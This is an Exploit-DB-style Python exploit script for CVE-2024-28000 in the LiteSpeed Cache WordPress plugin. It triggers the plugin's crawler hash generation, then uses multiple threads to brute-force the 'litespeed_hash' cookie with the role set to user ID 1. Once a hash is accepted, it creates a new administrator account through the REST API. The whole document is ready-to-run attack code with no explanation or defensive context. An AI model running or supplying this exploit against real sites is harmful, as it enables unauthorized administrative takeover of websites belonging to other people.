# Exploit Title: Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation # Date: 2025-06-10 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Country: United Kingdom # CVE : CVE-2024-28000 import requests import random import string import concurrent.futures # Configuration target_url = 'http://example.com' rest_api_endpoint = '/wp-json/wp/v2/users' ajax_endpoint = '/wp-admin/admin-ajax.php' admin_user_id = '1' num_hash_attempts = 1000000 num_workers = 10 new_username = 'newadminuser' # Replace with desired username new_user_password = 'NewAdminPassword123!' # Replace with a secure password def mt_srand(seed=None): """ Mimics PHP's mt_srand function by setting the seed for random number generation. """ random.seed(seed) def mt_rand(min_value=0, max_value=2**32 - 1): """ Mimics PHP's mt_rand function by generating a random number within the specified range. """ return random.randint(min_value, max_value) def generate_random_string(length=6): """ Generates a random string based on the output of mt_rand. """ chars = string.ascii_letters + string.digits return ''.join(random.choices(chars, k=length)) def trigger_hash_generation(): payload = { 'action': 'async_litespeed', 'litespeed_type': 'crawler' } try: response = requests.post(f'{target_url}{ajax_endpoint}', data=payload) if response.status_code == 200: print('[INFO] Triggered hash generation.') else: print(f'[ERROR] Failed to trigger hash generation - Status code: {response.status_code}') except requests.RequestException as e: print(f'[ERROR] AJAX request failed: {e}') def attempt_hash(hash_value): cookies = { 'litespeed_hash': hash_value, 'litespeed_role': admin_user_id } try: response = requests.post(f'{target_url}{rest_api_endpoint}', cookies=cookies) return response, cookies except requests.RequestException as e: print(f'[ERROR] Request failed: {e}') return None, None def create_admin_user(cookies): user_data = { 'username': new_username, 'password': new_user_password, 'email': f'{new_username}@example.com', 'roles': ['administrator'] } try: response = requests.post(f'{target_url}{rest_api_endpoint}', cookies=cookies, json=user_data) if response.status_code == 201: print(f'[SUCCESS] New admin user "{new_username}" created successfully!') else: print(f'[ERROR] Failed to create admin user - Status code: {response.status_code} - Response: {response.text}') except requests.RequestException as e: print(f'[ERROR] User creation request failed: {e}') def worker(): for _ in range(num_hash_attempts // num_workers): random_string = generate_random_string() print(f'[DEBUG] Trying hash: {random_string}') response, cookies = attempt_hash(random_string) if response is None: continue print(f'[DEBUG] Response status code: {response.status_code}') print(f'[DEBUG] Response content: {response.text}') if response.status_code == 201: print(f'[SUCCESS] Valid hash found: {random_string}') create_admin_user(cookies) return elif response.status_code == 401: print(f'[FAIL] Invalid hash: {random_string}') else: print(f'[ERROR] Unexpected response for hash: {random_string} - Status code: {response.status_code}') def main(): # Seeding the random number generator (mimicking mt_srand) mt_srand() trigger_hash_generation() with concurrent.futures.ThreadPoolExecutor(max_workers=num_workers) as executor: futures = [executor.submit(worker) for _ in range(num_workers)] concurrent.futures.wait(futures) if __name__ == '__main__': main()